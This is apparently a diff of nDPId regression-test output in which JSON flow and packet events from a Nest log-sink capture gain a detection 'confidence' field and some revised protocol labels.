-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714607530,"flow_last_seen":1536714609684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536714609684,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536714607530,"flow_last_seen":1536714609684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536714609684,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536714610253,"flow_last_seen":1536714610253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536714610253,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1536714610253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536714610253,"pkt":"AJD7JidrGLQwJjRACABFAAAsL74AAP8GGt\/AqPIPI7yauvdwK1cI1a0HAAAAAGACEgA9hwAAAgQEgAAA"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1536714610314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536714610314,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93Bcs3xVCNWtCGASbvAGcQAAAgQFjA=="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1536714610318,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536714610318,"pkt":"AJD7JidrGLQwJjRACABFAAAoL78AAP8GGuLAqPIPI7yauvdwK1cI1a0IXLN8VlAQEgB69gAAAAAAAAAA"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1536714610253,"flow_last_seen":1536714613730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1738,"flow_avg_l4_payload_len":248,"midstream":0,"ts_msec":1536714613730,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":268,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1536712992228,"flow_last_seen":1536714607385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1536714735302,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
-00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":268,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1536714602612,"flow_last_seen":1536714607322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":14831,"flow_avg_l4_payload_len":205,"midstream":0,"ts_msec":1536714735302,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
-00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":268,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1536714610253,"flow_last_seen":1536714615546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1536714735302,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":268,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536714602587,"flow_last_seen":1536714607527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1536714735302,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536714602587,"flow_last_seen":1536714607527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1536714795365,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1536714610253,"flow_last_seen":1536714613730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1738,"flow_avg_l4_payload_len":248,"midstream":0,"ts_msec":1536714613730,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00703{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":268,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1536712992228,"flow_last_seen":1536714607385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1536714735302,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63340,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"NestLogSink.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":268,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1536714602612,"flow_last_seen":1536714607322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":14831,"flow_avg_l4_payload_len":205,"midstream":0,"ts_msec":1536714735302,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63342,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":268,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1536714610253,"flow_last_seen":1536714615546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2786,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1536714735302,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63344,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":268,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536714602587,"flow_last_seen":1536714607527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1536714735302,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":274,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1536714602587,"flow_last_seen":1536714607527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"ts_msec":1536714795365,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402804,"flow_last_seen":1536716402804,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536716402804,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1536716402804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1536716402804,"pkt":"AJD7JidrGLQwJjRACABFAABEL\/cAAP8RJk\/AqPIPwKjyAc5xADUAMDxpd90BAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402804,"flow_last_seen":1536716402804,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536716402804,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402804,"flow_last_seen":1536716402804,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1536716402804,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1536716402805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1536716402805,"pkt":"GLQwJjRAAJD7JidrCABFAABUcEtAAEARZOvAqPIBwKjyDwA1znEAQGW0d92BgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536716402804,"flow_last_seen":1536716402805,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1536716402805,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536716402804,"flow_last_seen":1536716402805,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1536716402805,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716402828,"flow_last_seen":1536716402828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536716402828,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1536716402828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536716402828,"pkt":"AJD7JidrGLQwJjRACABFAAAsL\/gAAP8GGqXAqPIPI7yauvdxK1cI4Q21AAAAAGACEgDczAAAAgQEgAAA"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1536716402889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536716402889,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93El8kNOCOENtmASbvAVfwAAAgQFjA=="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1536716402894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536716402894,"pkt":"AJD7JidrGLQwJjRACABFAAAoL\/kAAP8GGqjAqPIPI7yauvdxK1cI4Q22JfJDT1AQEgCKBAAAAAAAAAAA"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716402828,"flow_last_seen":1536716404974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536716404974,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716402828,"flow_last_seen":1536716404974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536716404974,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63345,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1536716407003,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1536716407003,"pkt":"AJD7JidrGLQwJjRACABFAABXMB8AAP8RJhTAqPIPwKjyAc5xADUAQ16pMiMBAAABAAAAAAAAB2N6ZmUxMDUHZnJvbnQwMQVpYWQwMQpwcm9kdWN0aW9uBG5lc3QDY29tAAABAAE="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716407119,"flow_last_seen":1536716407119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536716407119,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1536716407119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536716407119,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCAAAP8GYljAqPIPI65S7fdyK1cI7G5zAAAAAGACEgDD3QAAAgQEgAAA"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1536716407186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536716407186,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93Kf6ho7COxudGASaQOxbwAAAgQFtA=="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1536716407188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536716407188,"pkt":"AJD7JidrGLQwJjRACABFAAAoMCEAAP8GYlvAqPIPI65S7fdyK1cI7G50n+oaPFAQEgAgMAAAAAAAAAAA"}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716407119,"flow_last_seen":1536716409280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536716409280,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716407119,"flow_last_seen":1536716409280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536716409280,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536716409847,"flow_last_seen":1536716409847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1536716409847,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1536716409847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1536716409847,"pkt":"AJD7JidrGLQwJjRACABFAAAsMCwAAP8GGnHAqPIPI7yauvdzK1cI9889AAAAAGACEgAbLAAAAgQEgAAA"}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1536716409908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1536716409908,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93M4S\/jECPfPPmASbvCMDgAAAgQFjA=="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1536716409910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1536716409910,"pkt":"AJD7JidrGLQwJjRACABFAAAoMC0AAP8GGnTAqPIPI7yauvdzK1cI988+OEv4xVAQEgAAlAAAAAAAAAAA"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536716409847,"flow_last_seen":1536716411997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1263,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1536716411997,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63347,"dst_port":11095,"l4_proto":"tcp","ndpi": {"proto":"NestLogSink.Google","breed":"Acceptable","category":"Cloud"}}
-00664{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":537,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1536714607530,"flow_last_seen":1536716407068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":4069,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1536716532444,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63343,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}}
